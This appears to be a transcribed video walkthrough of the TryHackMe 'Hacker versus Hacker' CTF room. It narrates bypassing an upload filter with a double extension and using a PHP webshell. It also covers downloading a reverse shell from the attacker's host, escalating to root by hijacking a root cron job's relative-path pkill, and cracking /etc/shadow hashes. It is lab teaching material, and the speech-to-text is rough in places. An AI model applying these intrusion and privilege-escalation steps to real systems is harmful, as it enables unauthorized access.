Hello and welcome again to another room here on TryHackMe. Today we're going to look at the room called Hacker versus Hacker. Now, I've been following the chat a bit on the official TryHackMe Discord channel, and this room stood up quite, an alarm. People really got like, what is this machine is all about? And I get it. It's this particular exploit we're gonna do exploits something that can be seen many times in the past, something called path exploitation. But I'm just gonna start the whole thing now and get started. Now, I haven't really done much of it. I did boot it up when it got out and just poked around a bit, but time is not here, and time is here now. So today is the day we're gonna do it. I copy pasted the IP address. I'm just gonna briefly check out if there's anything going on here. No, we're not seeing anything. I'm not connected to the network, so let me just do that pretty fast. So let's just. This is because I. Yeah, why not? So let's go take go to downloads. Now, I have a special command I execute in order to get this to work. Now, this doesn't really matter. It is just a terminal. The one terminal we're going to need now is the one we're going to call for nmap. So we're going to call nmap. Our typical scan we're going to do. So let's copy paste the IP like that. Go back, put it in, scan for different kind of versions of software, services and standard scripts. I'm gonna start it now. While this is running, I'm just gonna copy paste one more time and go to the. We have a URL here. It's a beautiful web page. Wow, if this is real statistics, it's incredible. But I kind of knew it in a way. It's not that. So we're going to scroll down a bit. We're going to see an upload functionality. If we look at the source code, we only get two different, comments. One of them is like the intern need to be fired because the intern is stupid, and something about a place called CVS. So let's go ahead and just check out /CVS directory is disabled. So there's also upload functionality here. We can just try anything, basically just take any whatever text file, this file for example, press upload, and what we see is this hacked. If you don't want to upload my shell, do better at filtering. Gonna watch the core source code, and we notice that all of this has been has been commented out. So this file here, upload PHP, most likely like 95% only contains this text. Maybe an echo statement in PHP, I don't really know, it doesn't really matter. But we see all this is the old code. And the file uploaded is being put in the CVS folder. Probably stands for CV and then S for plural, so CVs. No particular filter, but there is a type of string parse file here. If there is not a extension called PDF within the file we're trying to upload, it's gonna be only PDF files are accepted. Now the type of exploit you can do with this is basically just have a file. Let me just show you. If you have a file called say shell.php, then this is not gonna go. If you named it shell.pdf, it would go, but what we need is shell.pdf.php in this particular case, because it only looks for a position, doesn't mention about more positions, or which kind of position, if this is one and this is second. Well, you get the point, I guess. So what we're gonna do here now is to basically do a. Let me just see what this is. There is probably a shell uploaded. This is called Hacker versus Hacker, by the way. So we gotta think like a hacker. Something is uploaded already. So we're gonna take this, go to CVS. There we go. and go ahead and open up. As we see, nmap scan returned, standard SSH, standard port 80, nothing crazy going on here. So I'm not gonna do much more about this. I'm fairly sure what I see is what I'm gonna get. So GoBuster, whoa, let me slam again. GoBuster, you know, sometimes when I copy paste, it just, you know, doesn't do it. There we go. And then I'm gonna use user share word list director. Yeah, okay. Directory 1.medium, and we're gonna do extensions as PDF and PHP. Actually, I'm gonna do .pdf, .php in this particular case because I know it's gonna be something like that. I don't think it's gonna be reversed because it would be weird. Also, if it's reversed, it would probably not work. So let's see what this scan gives us. Now, while we wait, we don't need to wait anymore. There is a shell here called PDF. Let's just stop it, and we can just paste it in here, and you see, boom. Right click and see it doesn't really do much. Now, what is this? This particular shell here. Now, is it is it a reverse shell? It doesn't look like, because reverse shells doesn't output stuff. This could be something. It could, for example, take some commands. You know, we know that is a particular, you know, way to give yourself command execution to the server, and if you had commands you can execute directly from here, it would call a PHP function, probably called exec or something like that. But we would need a parameter, so I could put a question mark here and go and think, what is the most normal parameter to put into command execution? We could go to Google and say PHP command execution backdoor, you know, and just see what they usually do. Just in the very first one, they say like the one-liner, simple one-liner. I would say it's a pretty good chance it was just this one was used, and if so, that was the case, it's gonna look for a request called command, a cmd, a parameter. So I'm gonna do cmd equal ls, and we do see this here. So what we could do is just to say, I want to see the content of this file here now, and the content of this file is just basically this. So it's just some PHP code. Now, what we could do now is basically say ch/home, cd/home, thank you, semicolon and ls. And we know that there's a user called Laglan now, because in the home folder users are saved. So let's go and take this Laglan. Okay, so let's change folder to Laglan and ls-all to see what is inside of this. We see the user flag. I'm fairly sure it is. I'm not gonna output it, but it is there. There's a bin folder, weird thing to have in a home folder. There's some bash history, does look like we could output it. So let's go ahead and by the way, the bash history contains stuff that you type in the terminal. So if the user Laglan did type something here, we're gonna cat this out, cat, and then take this particular file and just cat it out. And what we see here is something about, this looks like a password. I'm gonna take this. I'm gonna say this is the password for Laglan, because what you see here is, not sure what that is. You know, it doesn't do anything to me. But what I think we should do now is we could just try and do something like SSH 1010 19 223 and then this weird name that I cannot pronounce, Laglan. And then just say yes, I wanna maybe it wants to connect, I don't know. Oops, I forgot the ad. So I'm gonna say yes to this, and then check this password here and say if this is a thing. Okay, so we have a shell now, and nope. Did we get disconnected? Let me just try one more time. So we're gonna take the password. ID. I am Lachlan. Nope. Okay. So we're getting disconnected. So if we look back at the room, it says something about that there's a hacker. Can you defeat him? So okay. So we're being kicked off the server because of a hacker is doing something. Now, what we could do is to go ahead and we could probably go ahead and get ourselves a shell from the web here. So what we're gonna do now is just to open up a new terminal window and just cd, and let me just do head shell php, no more, and we see that it connects to my machine and port 4444. So let's set up a Python web server on port 9000 here, and let's go to let me just see, what is it now? It is var isn't it? Yeah, and then HTML. So we're gonna take this particular path here. This is the root, so we can call, instead of shell p8 whatever, we can upload our own. So what we're gonna do here is say cd into this. Now we're there, and then wget http and then 10.11.0201 9000/shell php. So we're gonna, and then do ls. So now that we have this right there, I should be able to take this here and do shell php, and then set up a netcat listener on my own machine. Thank you. And then go here, call it. It's not in that folder. Call it. It's hanging, so it's good. Go back. We have a shell with a data. What I want to try now is to su into this Lachlan user, and then take the password basically, and see if this does change something. It's taking its time. Why not? Okay, I am Lachlan. I'm not being kicked by any particular reason, so let's go ahead and upgrade this shell a bit more. So I'm fairly confident that there's a Python installed. Let's just do this Python, and let's also do, so I can clear screen, please. There we go. That is it. So, oh, I am being kicked, but oh, I see. I'm still that user, but it destroys my PTY. As you can see, I spawn a PTY, but it's being kicked, but I'm still Lachlan right now. I'm just not, well, it's a really bad shell. I cannot do anything. I can even not type clear. I can. It remembers something. So let's go ahead and say home. I'm gonna have to copy paste this. There we go. And sorry for that. And then we're gonna go to the backup. Backup, okay. And it doesn't really have anything right there. It's pretty basic. What we did get in the start was something like where was it again? So let's go and do a ls here, and we did get it like an ls. So let's do cd/home/ laglan, whatever. So and then do a ls and see that we have the bin folder. ls-all. We need to output this one more time because I did see something but I forgot about it. Cat. Yeah, there's this cron tab here, so I really want to see what the cron tab contains. So let's cat this out. Okay, so every minute or so this is commented out, so that doesn't work, but every 50 seconds or something like that sleeps for, it's a weird way of doing it. It loads, it kills all the shells basically by calling pkill, and pkill is directly called as a relative path. It is not, you know, like this an absolute path. So that would basically mean this is called by root. So we can use this command to get root. So echo path, it would be the very first place is gonna look for pkill is in this particular folder. I guess. I really want to try to execute this command when I log in with the correct way here. So let me see if I can do this in a way. So let's open up a shell. Let's make this a bit smaller. And then let's size this up, SSH. So we're gonna do SSH this particular IP address. So let's see, we can just SSH laglan at this. And when we fire that off, we have to get the password pretty fast. So now that we put it in, take that. Alright, so it was a good idea to, let me just get the node, come on, kick me. So it actually looks in, because we didn't get the PTY shell, so we do have this here. So the home laglan bin folder, that's the very first place it's gonna be looking. Let me just show you what I talk about. So now that we know that, it will be looking for this. The path I have here is without the real bash. So I can clear the screen and say cd into let's just do home laglan bin, and here we can touch a file called pkill. I rather want to do echo, and then I need to find a particular script that can reverse connect to me. So let's do something like reverse shells here. I could try this here. I could try that. I could. Yeah, I want to try that. So we take this, and why I keep pressing this button? I don't know. Stop it. So let's take this here. It's gonna connect to my machine. So let's do 10.11.02.01 and do 5555. So we're gonna take this here. and see if we can echo this out into pkill. Isn't that what it is called? Let me just, where was it? Pkill. It is pkill. And then I could c8 mod plus h pkill, I guess. And then I could take a new one, say netcat listener on 5555, and I don't know how fast it will be, but we should either we see it or we don't. While we wait for that, we can just take this particular path one more time and just, because when we're being kicked, we should essentially getting back our shell. So I'm there. It says nope, I'm not getting anything back here, so 10, 11, 0, 2, 1. Yeah. Maybe I need to put something different in, because the file is definitely being called, and I just need to, well, let's see, cool. So we could just say ls and cat out pkill here and say this is what we have here, and it is chmod pkill. Oh, it wasn't executable. Oh, there we go. So I'm root now. Let's go to root, and there we have it, the root flag. So basically what we did is to use the leverage of the hacker that wasn't aware of we have a seriously bad shell. Sometimes a bad shell is not the baddest thing. In this particular case, it saved our behinds, and as you can see, I'm still connected. No need to do anything really. I could go in and just, you know, list all processes now and kill it. You know, I could do that because I'm root now. I could also go in and just delete the persistence file. It would be easier, but now I actually own the machine. So because they didn't, let me just see if I can find it again. So go to home and lan and ls-d, and we have the history. So this is the problem. This file right here, the content of this file, is because we, with root, every now and then execute a command of a relative path. The path, and this is the problem, it will look for this file in the path of my user. So it will essentially run the pkill command as we created in let me just see what we can do in this bin folder here. And this is the file that will connect back to our computer with the same privileges as the user that called the file, which is root. So yeah, I guess that's the best explanation I could do, just a standard path problem. But I understand the issues that this have been landing in the TryHackMe community. Also, I didn't really notice with the password before. I just figured, well, they do echo E, reverse it, and then, well, not reverse it, but they just have this, you know, this is the way as password. It's like, that's weird. So we can also go ahead and do cat etc shadow and then see Lachlan's shadow file. And if we took this particular hash right here and just, not shadow file, but the password, and then copy pasted it and went to our own machine, you know, and Don't know if this is gonna be taking too much time, but we could like echo all of this into yada yada and go to John and say yada yada. And then pick the word list. You know, I don't know if the particular password is in the word list. So let's do users, yeah, word list, like you. Why not using default input encoding? This is really not ASCII text. Okay. Anyways, this is probably the way you could do it. So I just feel like, couldn't we just, you know, copy paste this and say nano x y c, paste it in. Let's just say John XYZ. It should work. It was just a copy paste there. I know it was not text enough. And eventually you can get the password of this is the way 23, but since it's probably not going to be in this particular, you know, word list, what we could do is go ahead and just create our own and call it word list, and then put this something like that and password. And this is probably because this is not inside rock you. Can we get it, please? Not that. Let's post this one. Come on. And then we're gonna take this and then call directly from where we are, and it will crack it really fast. So as you can see, we could also have done something like that now, and there are many ways we could have, you know, cracked and proved that we was the correct assumption. Sometimes assumptions can be a good hint. So really hope you liked this video, and if you did so, please consider subscribing, hit the bell, notifications, and thank you one more time. I just hit 1,000 subscribers. It is all you guys who clicked the button, so just want to say thank you even one more time. Have a nice day, and see you again online.